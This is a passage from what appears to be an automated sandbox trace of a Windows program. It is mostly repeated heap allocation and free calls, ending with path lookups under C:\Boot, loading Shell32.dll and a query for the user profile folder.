dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.854] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.854] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.855] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.855] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.856] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.856] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.857] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.857] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.858] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.858] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.858] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.858] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.858] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.858] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.858] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.858] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.858] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.858] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.858] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.858] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.858] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.858] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.858] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.858] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.858] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.858] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.858] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.859] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0127.859] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.859] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.860] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0127.860] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.860] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0127.860] PathFindFileNameW (pszPath="") returned="" [0127.860] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.860] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0127.860] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0127.860] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0127.860] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 